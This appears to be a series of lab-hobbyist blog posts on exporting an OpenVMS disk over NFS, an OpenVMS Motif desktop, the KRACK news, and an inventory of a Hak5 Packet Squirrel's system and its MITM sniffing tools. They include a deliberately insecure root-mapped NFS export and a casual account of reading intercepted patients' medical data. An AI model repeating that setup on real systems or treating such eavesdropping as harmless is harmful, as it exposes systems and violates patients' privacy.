Now this is something that no admin would do with his/hers OpenVMS system, but since I run this in my lab and I like to experiment, I wanted to share my findings. Getting around filesystem on the OpenVMS is a little clumsy, so I wanted to try to export the whole dka0: disk (system) over NFS and mount in from Linux and explore it from there ( find, grep, strings, hexedit … you name it)

Prerequisites of this experiment are that you already have a running OpenVMS 8.4-2 system on your alphavm_free simulation as described here:

https://astr0baby.wordpress.com/2017/03/30/installing-openvms-v8-4-2-on-alphavm-pt-1/

https://astr0baby.wordpress.com/2017/04/02/installing-openvms-v8-4-2-on-alphavm-pt-2/

Do some time traveling if your TCPIP license expired ;)

So lets enable NFS server on the OpenVMS ; login as system and exec

$ @tcpip$config

Choose 3 – Server components

Now select to setup NFS first (make sure you start the service once enabled – this is how it should look like once setup) Exit from NFS Configuration [E] and setup PORTMAPPER 15

Once Enabled we are good; we jump out via [E] from the menu and get back to the shell, once there execute the following to get info about the disk to share via NFS

$ sh dev dk
Device Device Error Volume Free Trans Mnt
 Name Status Count Label Blocks Count Cnt
ALPHA1$DKA0: Mounted 0 ALPHASYS 8272640 356 1
ALPHA1$DKA200: Online 0
ALPHA1$DKA400: Online wrtlck 0

We want to share the DKA0:  with ID as ALPHASYS   via NFS

jump to the TCPIP subsystem   (Please note this is VERY UNSECURE :) )   10.0.2.2 is the IP address of the br0 interface on our Linux host  (uid=0 and gid=0 are for the Linux root user to be able to mount the NFS;  system is the OpenVMS account that has all the rights ….

$ tcpip
TCPIP> set host panasonic /address=10.0.2.2    (choose some other hostname)
TCPIP> map "/ALPHASYS" dka0:
TCPIP> add export "/ALPHASYS" /host=10.0.2.2
TCPIP> add proxy system /uid=0 /gid=0 /host=10.0.2.2

So now we should be able to query the simulated OpenVMS from our Linux host

panasonic mnt # showmount -e 10.0.2.12
Export list for 10.0.2.12:
/ALPHASYS PANASONIC
panasonic mnt #

And finally mount it

mount -o nolock 10.0.2.12:/ALPHASYS /mnt/nfs

Next we “explore”

sds

Here you go !  Now you can run simulated Alpha (DS20e – Alpha Station) Gentoo Linux  on your x86-64 !

https://45.76.81.249:8000/Gentoo/

The latest news about the KRACK gave me a nice flashback from the 2005’s and 2006’s. Back then almost nobody used Wireless encryption, nor the HTTPS as default for web traffic. Those were the days ….

We have survived the 0ld days on clear-text protocols with some hiccups sure, and most of us had a lot of fun abusing it.

Back in 2005/2006 I remember that it was not uncommon to transmit unencrypted WIFI data of blood test diagnosis labs (included names of patients, “SocialSecurityNumbers” and the medical results of each blood test)

I remember reading mails from the blood testing diagnosis lab nurses complaining about Syphilis tests that showed all prostitutes in the area as positive, requesting new sets of tests as these were most probably false positives. Next batch showed all negative results … As well as seeing all the pr0n requests made by the admins of such organizations.

Also it was pretty much standard stuff to run unencrypted “Peer WIFI” network that used “Home-Made WIFI Antennas ” so all that was really needed was to get on top of the flat rooftop collect “Unencrypted” wireless data.

All these we already went through, so I think there is no need to panic about the KRACK, just patch your systems and keep on truckin’

OK, this was one of the toughest missions that I would not be able to finish without some external help (Thanks to Stephen Hoffman‏ @HoffmanLabs )

who has pointed me in the right direction on how to obtain the proper OpenVMS Hobbyist license

Please refer to the following OpenVMS articles prior you get started

https://astr0baby.wordpress.com/2017/03/30/installing-openvms-v8-4-2-on-alphavm-pt-1/

https://astr0baby.wordpress.com/2017/04/02/installing-openvms-v8-4-2-on-alphavm-pt-2/

So these are the steps I have taken (First you need to register to DECUServe)  Check more info @ http://104.207.199.162/

To register for DECUServe

⁃ ssh to eisner.decuserve.org
⁃ login with username REGISTRATION
⁃ follow the bouncing ball..

Make sure you make the following ~/.ssh/config entry for the above host on your Linux machine (if recent)

eisner.decuserve.org
KexAlgorithms +diffie-hellman-group1-sha1
HostKeyAlgorithms +ssh-dss

Once you get registered on the DEVUServe you can apply for the hobbyist licenses via https://www.hpe.com/h41268/live/index_e.aspx?qid=24548

It took me a day before I received the Hobbyist License PAK.

Once you have it, install the DW-MOTIF license as follows

Load license for DW-MOTIF

$ @SYS$UPDATE:VMSLICENSE

Register DW-MOTIF like so

grep for the DW-MOTIF info in the LIC file you receive.

                     Issuer:  DEC
              Authorization:  xxxxxxxxx
               Product Name:  DW-MOTIF
                   Producer:  DEC
                      Units:  0
               Release Date:
                    Version:
           Termination Date:  xxxxxxxx
               Availability:
                   Activity:  CONSTANT=100
                    Options:
                      Token:
                Hardware ID:
                   Checksum:  xxxxxxxx

Next we will configure Xming via wine on Linux to actually be able to connect to the simulated OpenVMS Motif desktop.

Unfortunately both Xnest and Xephyr dont work well in this case (both crash after approx 1 minute of the OpenVMS Desktop)

What works for me is the following configuration

• Download Xming from  https://sourceforge.net/projects/xming/files/Xming/6.9.0.31/
• Make sure you have Wine configured on your linux machine
• add the following in the .wine/drive_c/Program Files (x86)/Xming/X1.hosts

OpenVMS
OpenVMS
10.0.2.12

Next login to the OpenVMS and initiate the OpenVMS Dekstop via the following

$ set display/create/node=10.0.2.2/transport=tcpip/server=1
$ run sys$system:decw$startlogin.exe

And on the Linux machine with the installed Xming execute the following

~/.wine/drive_c/Program Files (x86)/Xming $ wine Xming.exe :1

You should now get the following OpenVMS login screen

After you log in with your creds you get the OpenVMS desktop to play around with

Video of the above config

And installing/running Secure Web Browser V1.1-12 for OpenVMS Alpha 

Just got the new toy from Hak5 recently in my mail called the Packet Squirrel   Here are my first impressions and information about the device

To log into the device, connect a CAT5 ethernet cable to your computer  and the other end to the ETHERNET IN port (next to the power adapter port)

Bring the local netwrok interface up in your computer and run a dhclient on the device

Connect to via ssh as follows:

ssh root@172.16.32.1

BusyBox v1.23.2 (2017-06-28 18:58:08 PDT) built-in shell (ash)

  __ (\\_       Packet Squirrel           _//) __
 (_ \( '.)          by Hak5              (.' )/ _)
   ) \ _))   _                     __    ((_ / (
  (_   )_   (') Nuts for Networks ((')    _(   _)


root@squirrel:~#

Running a standard dmesg query is the first thing I usually do

root@squirrel:~# dmesg
[ 0.000000] Linux version 3.18.45 (sebkinne@buildbot) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49389) ) #49 Thu Jul 13
 17:58:25 PDT 2017
[ 0.000000] MyLoader: sysp=d5a28125, boardp=293d0927, parts=b826e6ed
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019374 (MIPS 24Kc)
[ 0.000000] SoC: Atheros AR9330 rev 1
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 04000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x00000000-0x03ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x00000000-0x03ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x00000000-0x03ffffff]
[ 0.000000] On node 0 totalpages: 16384
[ 0.000000] free_area_init_node: node 0, pgdat 803660f0, node_mem_map 81000000
[ 0.000000] Normal zone: 128 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 16384 pages, LIFO batch:3
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[ 0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
[ 0.000000] pcpu-alloc: [0] 0 
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
[ 0.000000] Kernel command line: board=HAK5-SQUIRREL console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd
[ 0.000000] PID hash table entries: 256 (order: -2, 1024 bytes)
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Writing ErrCtl register=00000000
[ 0.000000] Readback ErrCtl register=00000000
[ 0.000000] Memory: 60880K/65536K available (2523K kernel code, 143K rwdata, 540K rodata, 240K init, 188K bss, 4656K reserved)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] NR_IRQS:51
[ 0.000000] Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz
[ 0.000000] Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104)
[ 0.080000] pid_max: default: 32768 minimum: 301
[ 0.080000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.090000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.100000] NET: Registered protocol family 16
[ 0.100000] MIPS: machine is Squirrel V1.0
[ 0.570000] Switched to clocksource MIPS
[ 0.580000] NET: Registered protocol family 2
[ 0.580000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.580000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.580000] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.590000] TCP: reno registered
[ 0.590000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.600000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.610000] NET: Registered protocol family 1
[ 0.610000] PCI: CLS 0 bytes, default 32
[ 0.620000] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.640000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.640000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.650000] msgmni has been set to 118
[ 0.660000] io scheduler noop registered
[ 0.660000] io scheduler deadline registered (default)
[ 0.670000] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[ 0.670000] ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11, base_baud = 1562500) is a AR933X UART
[ 0.680000] console [ttyATH0] enabled
[ 0.690000] bootconsole [early0] disabled
[ 0.700000] m25p80 spi0.0: found mx25l12805d, expected m25p80
[ 0.710000] m25p80 spi0.0: mx25l12805d (16384 Kbytes)
[ 0.710000] 5 tp-link partitions found on MTD device spi0.0
[ 0.720000] Creating 5 MTD partitions on "spi0.0":
[ 0.720000] 0x000000000000-0x000000020000 : "u-boot"
[ 0.730000] 0x000000020000-0x00000013aa14 : "kernel"
[ 0.730000] 0x00000013aa14-0x000000ff0000 : "rootfs"
[ 0.740000] mtd: device 2 (rootfs) set to be root filesystem
[ 0.740000] 1 squashfs-split partitions found on MTD device rootfs
[ 0.750000] 0x000000e50000-0x000000ff0000 : "rootfs_data"
[ 0.750000] 0x000000ff0000-0x000001000000 : "art"
[ 0.760000] 0x000000020000-0x000000ff0000 : "firmware"
[ 0.780000] libphy: ag71xx_mdio: probed
[ 1.370000] ag71xx ag71xx.0: connected to PHY at ag71xx-mdio.1:04 [uid=004dd041, driver=Generic PHY]
[ 1.380000] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode:MII
[ 1.970000] ag71xx-mdio.1: Found an AR7240/AR9330 built-in switch
[ 2.000000] eth1: Atheros AG71xx at 0xba000000, irq 5, mode:GMII
[ 2.000000] TCP: cubic registered
[ 2.010000] NET: Registered protocol family 17
[ 2.010000] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you
 need this.
[ 2.020000] 8021q: 802.1Q VLAN Support v1.8
[ 2.040000] VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
[ 2.040000] Freeing unused kernel memory: 240K (80384000 - 803c0000)
[ 3.560000] init: Console is alive
[ 3.570000] init: - watchdog -
[ 5.640000] usbcore: registered new interface driver usbfs
[ 5.640000] usbcore: registered new interface driver hub
[ 5.650000] usbcore: registered new device driver usb
[ 5.710000] SCSI subsystem initialized
[ 5.720000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 5.730000] ehci-platform: EHCI generic platform driver
[ 5.730000] ehci-platform ehci-platform: EHCI Host Controller
[ 5.740000] ehci-platform ehci-platform: new USB bus registered, assigned bus number 1
[ 5.750000] ehci-platform ehci-platform: irq 3, io mem 0x1b000000
[ 5.770000] ehci-platform ehci-platform: USB 2.0 started, EHCI 1.00
[ 5.770000] hub 1-0:1.0: USB hub found
[ 5.770000] hub 1-0:1.0: 1 port detected
[ 5.780000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 5.790000] ohci-platform: OHCI generic platform driver
[ 5.800000] usbcore: registered new interface driver usb-storage
[ 6.620000] init: - preinit -
[ 7.380000] random: procd urandom read with 11 bits of entropy available
[ 10.570000] mount_root: loading kmods from internal overlay
[ 10.870000] jffs2: notice: (343) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orph
an) and 0 of xref (0 dead, 0 orphan) found.
[ 10.890000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[ 10.900000] block: extroot: not configured
[ 10.930000] jffs2: notice: (340) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orph
an) and 0 of xref (0 dead, 0 orphan) found.
[ 11.050000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[ 11.060000] block: extroot: not configured
[ 11.070000] mount_root: switching to jffs2 overlay
[ 11.120000] procd: - early -
[ 11.120000] procd: - watchdog -
[ 11.920000] procd: - ubus -
[ 12.930000] procd: - init -
[ 15.400000] NET: Registered protocol family 10
[ 15.410000] tun: Universal TUN/TAP device driver, 1.6
[ 15.410000] tun: (C) 1999-2004 Max Krasnyansky <maxk@qualcomm.com>
[ 15.430000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 15.450000] fuse init (API version 7.23)
[ 15.460000] Loading modules backported from Linux version v4.4-rc5-1913-gc8fdf68
[ 15.470000] Backport generated by backports.git backports-20151218-0-g2f58d9d
[ 15.480000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 15.500000] nf_conntrack version 0.5.0 (955 buckets, 3820 max)
[ 15.530000] usbcore: registered new interface driver ums-alauda
[ 15.540000] usbcore: registered new interface driver ums-cypress
[ 15.540000] usbcore: registered new interface driver ums-datafab
[ 15.550000] usbcore: registered new interface driver ums-freecom
[ 15.560000] usbcore: registered new interface driver ums-isd200
[ 15.570000] usbcore: registered new interface driver ums-jumpshot
[ 15.570000] usbcore: registered new interface driver ums-karma
[ 15.580000] usbcore: registered new interface driver ums-sddr09
[ 15.590000] usbcore: registered new interface driver ums-sddr55
[ 15.600000] usbcore: registered new interface driver ums-usbat
[ 15.630000] xt_time: kernel timezone is -0000
[ 15.750000] PPP generic driver version 2.4.2
[ 15.760000] NET: Registered protocol family 24
[ 21.440000] hub 1-0:1.0: USB hub found
[ 21.450000] hub 1-0:1.0: 1 port detected
[ 37.340000] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 37.390000] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready
[ 38.990000] eth1: link up (1000Mbps/Full duplex)
[ 38.990000] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
[ 80.280000] random: nonblocking pool is initialized
[ 261.110000] eth1: link down
[ 264.290000] eth0: link up (100Mbps/Full duplex)
[ 264.290000] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready

Lets see what kernel and arch we are running here … MIPS !

root@squirrel:/etc/ssh# uname -a
 Linux squirrel 3.18.45 #49 Thu Jul 13 17:58:25 PDT 2017 mips GNU/Linux

What is the detailed info about the current kernel ?

root@squirrel:/etc/ssh# cat /proc/version
 Linux version 3.18.45 (sebkinne@buildbot) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49389) ) #49 Thu Jul 13 17:58:25 PDT 2017

Lets check what modules are loaded on the Packet Squirrel

root@squirrel:/etc/ssh# lsmod
 arc4 1296 0
 ath 20005 3 ath9k
 ath9k 87286 0
 ath9k_common 19294 1 ath9k
 ath9k_hw 336753 2 ath9k
 cfg80211 216387 4 ath9k
 compat 12643 4 ath9k
 crc16 999 1 ext4
 crc_ccitt 1003 1 ppp_async
 crypto_blkcipher 10503 1 arc4
 crypto_hash 9746 2 ext4
 ehci_hcd 31996 1 ehci_platform
 ehci_platform 3360 0
 ext4 312204 0
 fuse 66153 0
 gpio_button_hotplug 4464 0
 ip6_tables 9281 3 ip6table_raw
 ip6t_REJECT 1184 2
 ip6table_filter 608 1
 ip6table_mangle 1072 1
 ip6table_raw 576 1
 ip_tables 9437 4 iptable_nat
 ipt_MASQUERADE 624 2
 ipt_REJECT 912 2
 iptable_filter 672 1
 iptable_mangle 944 1
 iptable_nat 752 1
 iptable_raw 640 1
 ipv6 257144 24 nf_conntrack_ipv6
 jbd2 47538 1 ext4
 ledtrig_usbdev 1920 0
 mac80211 399098 1 ath9k
 mbcache 4525 1 ext4
 nf_conntrack 47579 11 nf_nat_ipv4
 nf_conntrack_ftp 5264 1 nf_nat_ftp
 nf_conntrack_ipv4 4640 10
 nf_conntrack_ipv6 4928 3
 nf_conntrack_rtcache 2448 0
 nf_defrag_ipv4 790 1 nf_conntrack_ipv4
 nf_defrag_ipv6 9063 1 nf_conntrack_ipv6
 nf_log_common 2271 2 nf_log_ipv4
 nf_log_ipv4 3120 0
 nf_log_ipv6 3280 0
 nf_nat 8843 5 nf_nat_ipv4
 nf_nat_ftp 1184 0
 nf_nat_ipv4 3649 1 iptable_nat
 nf_nat_masquerade_ipv4 1388 1 ipt_MASQUERADE
 nf_reject_ipv4 1811 1 ipt_REJECT
 nf_reject_ipv6 1879 1 ip6t_REJECT
 nls_base 4960 1 usbcore
 ohci_hcd 22175 1 ohci_platform
 ohci_platform 2736 0
 ppp_async 6320 0
 ppp_generic 20578 3 pppoe
 pppoe 8160 0
 pppox 1338 1 pppoe
 scsi_mod 85623 3 ums_cypress
 sd_mod 25536 0
 slhc 4283 1 ppp_generic
 tun 15183 0
 ums_alauda 8240 0
 ums_cypress 2224 0
 ums_datafab 4656 0
 ums_freecom 1952 0
 ums_isd200 5008 0
 ums_jumpshot 3584 0
 ums_karma 1520 0
 ums_sddr09 8688 0
 ums_sddr55 4800 0
 ums_usbat 7312 0
 usb_common 1144 1 usbcore
 usb_storage 37727 10 ums_usbat
 usbcore 118164 16 ums_usbat
 x_tables 11746 26 ipt_REJECT
 xt_CT 2208 0
 xt_LOG 752 0
 xt_REDIRECT 1040 0
 xt_TCPMSS 2592 2
 xt_comment 480 76
 xt_conntrack 2160 12
 xt_id 480 0
 xt_limit 992 20
 xt_mac 624 0
 xt_mark 656 0
 xt_multiport 1168 0
 xt_nat 1056 0
 xt_state 688 0
 xt_tcpudp 1680 10
 xt_time 1632 0

How is the kernel loaded ?

root@squirrel:/etc/ssh# cat /proc/cmdline
 board=HAK5-SQUIRREL console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd

Lets check the CPU info

root@squirrel:/etc/ssh# cat /proc/cpuinfo
 system type : Atheros AR9330 rev 1
 machine : Squirrel V1.0
 processor : 0
 cpu model : MIPS 24Kc V7.4
 BogoMIPS : 265.42
 wait instruction : yes
 microsecond timers : yes
 tlb_entries : 16
 extra interrupt vector : yes
 hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
 isa : mips1 mips2 mips32r1 mips32r2
 ASEs implemented : mips16
 shadow register sets : 1
 kscratch registers : 0
 package : 0
 core : 0
 VCED exceptions : not available
 VCEI exceptions : not available

Looks like this system is a modified openwrt

root@squirrel:/etc/ssh# cat /etc/openwrt_version
 15.05.1

First thing after initial login, regenerating the host DSA/RSA hostkeys and changing the default root password is a good practice

root@squirrel:/etc/ssh# ls -al
 drwxrwxr-x 1 root root 0 Jul 14 00:59 .
 drwxrwxr-x 1 root root 0 Jul 14 01:06 ..
 -rw-r--r-- 1 root root 1632 Jul 5 02:33 ssh_config
 -rw------- 1 root root 668 Jul 14 00:59 ssh_host_dsa_key
 -rw-r--r-- 1 root root 603 Jul 14 00:59 ssh_host_dsa_key.pub
 -rw------- 1 root root 1675 Jul 14 00:59 ssh_host_rsa_key
 -rw-r--r-- 1 root root 395 Jul 14 00:59 ssh_host_rsa_key.pub
 -rw-rw-r-- 1 root root 114 Jul 5 02:29 sshd_config
root@squirrel:/etc/ssh# rm ssh_host_rsa_key*
root@squirrel:/etc/ssh# rm ssh_host_dsa_key*

root@squirrel:/etc/ssh# ssh-keygen -f /etc/ssh/ssh_host_rsa_key -N '' -t rsa
root@squirrel:/etc/ssh# ssh-keygen -f /etc/ssh/ssh_host_dsa_key -N '' -t dsa

root#squirrel:/etc/ssh# passwd

Let’s check the OpenSSH version on the Packet Squirrel and some configuration details

root@squirrel:/etc/ssh# /usr/sbin/sshd --version
OpenSSH_7.1p2, OpenSSL 1.0.2j 26 Sep 2016
root@squirrel:/etc/ssh# cat /etc/ssh/sshd_config
  PermitRootLogin yes
  PubkeyAuthentication yes
  AuthorizedKeysFile .ssh/authorized_keys
  Subsystem sftp internal-sftp

What options does the opensshd run under (defaults apart from the above) ?

root@squirrel:/etc/ssh# /usr/sbin/sshd -T

port 22
 protocol 2
 addressfamily any
 listenaddress 0.0.0.0:22
 listenaddress [::]:22
 serverkeybits 1024
 logingracetime 120
 keyregenerationinterval 3600
 x11displayoffset 10
 maxauthtries 6
 maxsessions 10
 clientaliveinterval 0
 clientalivecountmax 3
 streamlocalbindmask 0177
 permitrootlogin yes
 ignorerhosts yes
 ignoreuserknownhosts no
 rhostsrsaauthentication no
 hostbasedauthentication no
 hostbasedusesnamefrompacketonly no
 rsaauthentication yes
 pubkeyauthentication yes
 passwordauthentication yes
 kbdinteractiveauthentication yes
 challengeresponseauthentication yes
 printmotd yes
 printlastlog yes
 x11forwarding no
 x11uselocalhost yes
 permittty yes
 permituserrc yes
 strictmodes yes
 tcpkeepalive yes
 permitemptypasswords no
 permituserenvironment no
 uselogin no
 compression delayed
 gatewayports no
 usedns no
 allowtcpforwarding yes
 allowagentforwarding yes
 allowstreamlocalforwarding yes
 useprivilegeseparation yes
 fingerprinthash SHA256
 pidfile /var/run/sshd.pid
 xauthlocation /usr/bin/xauth
 ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
 macs umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@open
 ssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
 versionaddendum none
 kexalgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sh
 a256,diffie-hellman-group14-sha1
 hostbasedacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert
 -v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-ni
 stp521,ssh-ed25519,ssh-rsa
 hostkeyalgorithms ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@ope
 nssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,s
 sh-ed25519,ssh-rsa
 pubkeyacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v0
 1@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp
 521,ssh-ed25519,ssh-rsa
 loglevel INFO
 syslogfacility AUTH
 authorizedkeysfile .ssh/authorized_keys
 hostkey /etc/ssh/ssh_host_rsa_key
 hostkey /etc/ssh/ssh_host_dsa_key
 hostkey /etc/ssh/ssh_host_ecdsa_key
 hostkey /etc/ssh/ssh_host_ed25519_key
 subsystem sftp internal-sftp
 maxstartups 10:30:100
 permittunnel no
 ipqos lowdelay throughput
 rekeylimit 0 0
 permitopen any

What default network daemons are listening ?

root@squirrel:/usr/share# netstat -antp
 Active Internet connections (servers and established)
 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
 tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 1309/dnsmasq
 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1098/sshd
 tcp 0 0 172.16.32.1:22 172.16.32.132:44530 ESTABLISHED 2301/0
 tcp 0 0 :::53 :::* LISTEN 1309/dnsmasq
 tcp 0 0 :::22 :::* LISTEN 1098/sshd

Finally some info on local tools available on the Packet Squirrel

root@squirrel:/proc# nmap --version

Nmap version 6.47 ( http://nmap.org )
 Platform: mips-openwrt-linux-gnu
 Compiled with: openssl-1.0.2j nmap-libpcre-7.6 libpcap-1.5.3 nmap-libdnet-1.12 ipv6
 Compiled without: liblua
 Available nsock engines: epoll poll sele

root@squirrel:/proc# openvpn --version
 OpenVPN 2.3.6 mips-openwrt-linux-gnu [SSL (PolarSSL)] [LZO] [EPOLL] [MH] [IPv6] built on Jun 28 2017
 library versions: PolarSSL 1.3.14, LZO 2.08
 Originally developed by James Yonan
 Copyright (C) 2002-2010 OpenVPN Technologies, Inc. <sales@openvpn.net>

root@squirrel:/usr/sbin# ./dsniff -h
 Version: 2.4

root@squirrel:/usr/sbin# ./dnsspoof -h
 Version: 2.4

root@squirrel:/usr/sbin# ./sshmitm -h
 Version: 2.4

root@squirrel:/usr/sbin# ./webmitm -h
 Version: 2.4

root@squirrel:/usr/sbin# ./mailsnarf -h
 Version: 2.4

root@squirrel:/usr/sbin# ./macof -h
 Version: 2.4

root@squirrel:/rom# python2.7 -v
 # installing zipimport hook
 import zipimport # builtin
 # installed zipimport hook
 import site # from /usr/lib/python2.7/site.py
 import os # from /usr/lib/python2.7/os.py
 import errno # builtin
 import posix # builtin
 import posixpath # from /usr/lib/python2.7/posixpath.py
 import stat # from /usr/lib/python2.7/stat.py
 import genericpath # from /usr/lib/python2.7/genericpath.py
 import warnings # from /usr/lib/python2.7/warnings.py
 import linecache # from /usr/lib/python2.7/linecache.py
 import types # from /usr/lib/python2.7/types.py
 import UserDict # from /usr/lib/python2.7/UserDict.py
 import _abcoll # from /usr/lib/python2.7/_abcoll.py
 import abc # from /usr/lib/python2.7/abc.py
 import _weakrefset # from /usr/lib/python2.7/_weakrefset.py
 import _weakref # builtin
 import copy_reg # from /usr/lib/python2.7/copy_reg.py
 import traceback # from /usr/lib/python2.7/traceback.py
 import sysconfig # from /usr/lib/python2.7/sysconfig.py
 import re # from /usr/lib/python2.7/re.py
 import sre_compile # from /usr/lib/python2.7/sre_compile.py
 import _sre # builtin
 import sre_parse # from /usr/lib/python2.7/sre_parse.py
 import sre_constants # from /usr/lib/python2.7/sre_constants.py
 dlopen("/usr/lib/python2.7/lib-dynload/_locale.so", 2);
 import _locale # dynamically loaded from /usr/lib/python2.7/lib-dynload/_locale.so
 import _sysconfigdata # from /usr/lib/python2.7/_sysconfigdata.py
 import encodings # directory /usr/lib/python2.7/encodings
 import encodings # from /usr/lib/python2.7/encodings/__init__.py
 import codecs # from /usr/lib/python2.7/codecs.py
 import _codecs # builtin
 import encodings.aliases # from /usr/lib/python2.7/encodings/aliases.py
 import encodings.ascii # from /usr/lib/python2.7/encodings/ascii.py
 Python 2.7.12 (default, Jun 28 2017, 19:07:03)
 [GCC 4.8.3] on linux2
 Type "help", "copyright", "credits" or "license" for more information

Next I will configure some test PAYLOADS on the Packet Squirrel, hopefully I will be able to post my next findings soon.

P.S. Need to get an emulated system with MIPS and install GCC to build some tools that might be of use for the next exploits with the Packet Squirrel

From the QEMU LinuxMIPS WIKI  the CPU on the Packet Squirrel is compatible with Qemu and since Packet Squirrel is based on OpenWRT it looks like it should work

OpenWrt in QEMU MIPS

qemu-system-mipsel -kernel openwrt-malta-le-vmlinux-initramfs.elf -nographic -m 256

qemu-system-mipsel -M malta \
-hda openwrt-malta-le-root.ext4 \
-kernel openwrt-malta-le-vmlinux.elf \
-nographic -append "root=/dev/sda console=ttyS0"

Since the hardware footprint of the Packet Squirrel is so limited (2 MB for root filesystem  / and 30 MB for tempfs  /tmp) I have decided to find a way how to get GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.

I have attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as EXT4 /dev/sda1 partition

Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

Device Boot Start End Blocks Id System
/dev/sda1 1 12199 7624372+ 83 Linux

/dev/sda1 gets automounted on /mnt upon boot so we can use this extra space for the GCC and other dependencies

Since I did not want to go through the cross-compilation on my x86_64 Linux machine to get the mips binaries I have downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop

https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/

The following packages are needed to get C code to compile natively on the Packet Squirrel

wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libbfd_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libopcodes_2.24-3_ar71xx.ipk
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/objdump_2.24-3_ar71xx.ipk
